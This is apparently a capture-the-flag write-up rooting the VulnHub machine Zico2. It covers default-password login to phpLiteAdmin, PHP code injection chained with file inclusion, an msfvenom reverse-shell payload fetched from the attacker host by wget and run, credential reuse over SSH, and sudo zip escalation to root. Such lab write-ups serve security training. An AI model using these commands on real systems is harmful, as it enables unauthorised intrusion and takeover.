Zico2 is a machine that came on VulnHub. Created by Rafael, it surfaced on June 19th, 2017. It can be downloaded from https://www.vulnhub.com/entry/zico2-1,210/
The objective is to get root privileges and get the flag.
For a change, I would be using https://root-me.org to run the target machine. I tried to run the machine locally using VMware and Virtual Box, however, due to some networking issues, Zico was not being assigned an IP address. I contacted Rafael on Twitter, and he was more than happy and willing to solve my problem. In the end, he suggested I give https://root-me.org a try as they already have a working copy of Zico in their CTF-all-day.
Once signed up, the process of starting Zico is simple. You go on CTF-all-day, select the vulnerable machine you want to use, in this case, Zico2 (last in the last as its alphabetized), and you start the game.
My machine was reachable at http://ctf03.root-me.org/, and this is what it showed:
Let the attacking begin. Like my attacking machine, I will be using Kali 2017.1 running on a VMware Fusion.
Running a simple Zenmap scan showed the following ports open:
Seeing we know that there is Zico’s Shop running on port 80, let’s just focus on that for now. I ran dirb to see what more information I could gather from it:
$ dirb http://ctf03.root-me.org/
This showed a directory called dbadmin which had a PHP file called test_db.php:
Which opened phpLiteAdmin. Trying the first default password, admin, gave me the entry to go in:
I looked around and found that 2 users were created. I tried to decrypt the hash and log in using SSH, but it did not work:
After looking around for a while, I realized that this might be vulnerable to Remote PHP Code Injection (https://www.exploit-db.com/exploits/24044/), so I thought I would give that a try:
- So, I created a database called hack.php
- I created a table with the name test with 1 column
- Under test, I created a field test as TEXT and with the default value: <?php phphinfo(); ?>
Now, to exploit this, I need to find an LFI vulnerability.
To do that, I went back to the web application and started going through the source code. Within minutes the following code block caught my eye:
Ethical Hacking Training – Resources (InfoSec)
This looked like something I could work with:
It worked! Now it is time to make a shell and get connected. To make the shell, I used MSFvenom:
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=172.16.92.141 lport=4444 -f elf > /root/Desktop/shell
Time to upload it to the target machine:
I update the entry in the table to the following:
<?php system(“cd /tmp; wget http://172.16.92.141/shell; chmod +x shell; ./shell”); ?>
moreover, start a multi/handler on Metasploit:
and we get a session!
Now when looked into the folders, a file called, wp-config.php present in /home/zico/wordpress/ seemed to give some useful information:
Using these credentials, I tried to log in via SSH, and they worked!
Now time to get root privileges:
On trying the command:
$ sudo -l
This is what is showed us:
After running the following two commands:
$ touch /tmp/exploit
$ sudo -u root zip /tmp/exploit.zip /tmp/exploit -T –unzip-command=”sh -c /bin/sh”
We are root!
Here’s the flag: